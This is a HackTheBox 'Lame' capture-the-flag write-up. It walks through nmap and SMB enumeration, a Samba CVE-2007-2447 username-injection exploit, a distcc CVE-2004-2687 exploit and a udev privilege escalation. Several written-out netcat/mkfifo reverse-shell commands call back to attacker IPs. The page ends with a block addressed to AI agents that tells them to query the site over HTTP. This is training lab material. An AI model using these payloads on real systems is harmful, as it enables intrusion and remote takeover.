# Lame Writeup

![](/files/-Ma_yMFbKKZ6Y3KWs7C7)

## Reconnaissance&#x20;

Initial Nmap Scan to find open ports, using treat all hosts as online (**-Pn)** &#x20;

```bash
nmap -Pn 10.10.10.3
```

![](/files/-Ma_rYgPqobF40rZ4opR)

Nmap Scan on all ports (including UDP) so that we do not miss any ports that did not show up in the initial scan

![](/files/-Maa319dfLIkWpUwm8r4)

Nmap Scan for service version (**-sV)** running default nmap scripts (**-sC**) enumerating ports 21, 22, 139, 445 (**-p)** and saving it into a file called nmap (**-oN)**.

```bash
nmap -sC -sV -p 21,22,139,445 -oN nmap 10.10.10.3
```

![](/files/-Ma_sK_RX-cHWukzXoQV)

## Enumeration

#### Port 21: FTP; vsftpd 2.3.4

First thing to do is to search this version on google and look for knows exploits&#x20;

![](/files/-Maa22dwpa7ASySErItQ)

The first link is a Metasploit tutorial on how to exploit it, but we are doing it without Metasploit so lets click the second link.

![](/files/-Maa2aC1v73JyXu01Cfo)

Now, we can copy this exploit or we can search it up on searchsploit and copy it to our directory there.

```bash
searchsploit vsftpd 2.3.4
```

![](/files/-Maa3gdVgQhEqbI-5xza)

Now lets copy the exploit to our directory&#x20;

```bash
searchsploit -m unix/remote/49757.py
```

![](/files/-Maa44FyMOPvZSUF4sg0)

I tried exploiting this using the python exploit we found, but it constantly showed a time out error, which means that the exploit is probably is outdated and does not work anymore.&#x20;

![](/files/-Maa74u4oxiJOrmoGrkI)

Next thing to do is to enumerate the Anonymous FTP login allowed we found on our nmap scan

![](/files/-Maa6uJDAHqqPoYny6_v)

Let us login

Username: anonymous

Password: anonymous

![](/files/-Maa7Gvsy0dcU7w43zy5)

Lets list what the ftp server contains

![](/files/-Maa7af_KZtErhlkNeb1)

and ….. nothing , well, at least we tried. 😉

#### Port 22 OpenSSH 4.7p1

Searching on google does not give us something interesting. And usually we cannot exploit port 22, we only use it to ssh into the machine after we find the username or password from other ports or if we find a id\_rsa file.

#### Port 139 and 445 Samba&#x20;

Usually we find exploits on ports 139 and 445 which are Samba ports, so let us enumerate these ports

**smbclient** is a very common tool used to enumerate Samba ports, so let us use smbclient to access the SMB server.

```bash
smbclient -L 10.10.10.3 # "-L" lists what services are available 
```

![](/files/-Maa92OHOrkgtUMav2k4)

Now let us look at the permission on the share drives (this can be done with the **-H** flag)

```bash
smbmap -H 10.10.10.3
```

![](/files/-MaaYC7LvLx_bzoh0vYh)

Looking at this , we can see that we have Read and Write permissions for the tmp Disk on the Smb server. Lets go look for vulnerabilities on this version, and code execution ones as we have write permissions on a share.

After searching for a while I found a exploit that looks like the one we want. [CVE-2007-2447](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447)

![](/files/-MaabXm98Y26QRu_qihD)

![](/files/-Maac8Xrm7IiRqA3tKVQ)

Reading through the exploit, we can understand that we are able to execute arbitrary commands via shell metacharacters. Lets search this on [exploit-db ](https://www.exploit-db.com/exploits/16320)and look at the code.

```ruby
username = "/=`nohup " + payload.encoded + "`"
```

This line tells us that we can add our payload in the "payload.encoded" space and it will work, we can try adding a simple Netcat reverse shell and get a reverse shell.

#### Port 3632 distcc v1

Let us go to google.com and try finding some information on this&#x20;

Google says that this service is vulnerable to a [remote code execution vulnerability](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855) and we can use a nmap script that will give us more information.

![](/files/-MaafBO0ZKsb8eMVU_1w)

## Exploitation&#x20;

### Samba&#x20;

Lets start a Netcat listener on our machine

```bash
nc -nvlp 1234
```

![](/files/-MaaflqsmBfnXu6mt4Yh)

Now let us login into the smb client that we found while enumerating

```bash
smbclient //10.10.10.3
```

![](/files/-MaaftkP3ECGD0kJikwC)

Now we have to send the shell metacharacters as input into the username parameter with a reverse shell payload to get a reverse shell on our machine.

We can find a good reverse shell on [pentestmonkey's reverse shell cheat sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet). Replace the ip with yours, you can find your ip with this command.

```bash
ifconfig 
```

It is the number next to inet under tun0 (make sure you are connected to the OpenVPN).

Now let us add our payload in the username parameter

```bash
logon "/=`nohup rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 1234 >/tmp/f -e /bin/sh`"
```

"logon" is the command used for logging into a user within smbclient

After clicking enter, you should get a reverse shell on your reverse shell listener&#x20;

![](/files/-Maaj4hJn6vxH5J8ncti)

And we are root :), Go get both those flags.

### Distcc

In the enumeration part we found out that the service is vulnerable to [CVE-2004-2687](https://www.exploit-db.com/exploits/9915) and we found a [nmap script](https://nmap.org/nsedoc/scripts/distcc-cve2004-2687.html) that can be used to exploit this vulnerability.

```bash
nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='id'"
```

This is the nmap command, we can see that we try running a reverse shell instead of 'id' and try getting a reverse shell.

```bash
nmap -p 3632 10.10.10.3 --script distcc-exec --script-args="distcc-exec.cmd='rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.13.8.64 1234 >/tmp/f -e /bin/sh'"
```

Lets start a Netcat reverse shell listener and wait for a connection after entering this command

![](/files/-Maao60wQ3PUFPjFuyrc)

![](/files/-MaaoOg1cKeay8BbUNcT)

And we get a reverse shell, but as a user :/, time to privilege escalate and get root

Lets look at the OS version and look for exploits&#x20;

```bash
uname -a
```

![](/files/-MaaonoqdvGx9e3XdHvZ)

After a lot of searching I found an [exploit ](https://www.exploit-db.com/exploits/8572)that might work, lets copy it form searchsploit&#x20;

![](/files/-MaaqxocYeNhbC1XI7AR)

Now we have to transfer it to the victim machine, we can do this by starting a python http server and using "wget" on the victim machine to get the file.

![](/files/-MaarNSwuZjeRyDJSG30)

![](/files/-MaarcVnG8gqRHckLhAS)

We can see that it transferred successfully, now we have to compile the .c file using gcc and change the name to exploit

```bash
gcc 8572.c -o exploit
```

Now we have to run this, to do this we have to look at the instruction they gave us when we found this exploit.

![](/files/-MaasZ3Qup--AhM3y70Q)

Now first we have to find the PID of the udevd netlink socket, to do this we can use this command

```bash
ps -aux | grep devd
```

![](/files/-MaatFT6i0p9jo2Jlk6H)

And now we have to subtract one from the PID which will 2740

Now we have to create a file called run in the /tmp folder and add a payload in it, which will be our reverse shell.&#x20;

First we need to add&#x20;

```bash
#!/bin/bash 
```

to the file as then it can recognize that it is a bash script

```bash
echo '#!/bin/bash' > run
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 1234 >/tmp/f' >> run
```

![](/files/-MaawMHA90ciwz6YxFqm)

After this , start a listener on your machine and run the exploit with the PID - 1

```bash
./exploit 2740
```

After this you should have root :)

![](/files/-MaaxROULFOzY6WrDy-P)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://writeups.adityadindi.com/hackthebox/linux-boxes-w-o-metasploit/untitled.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.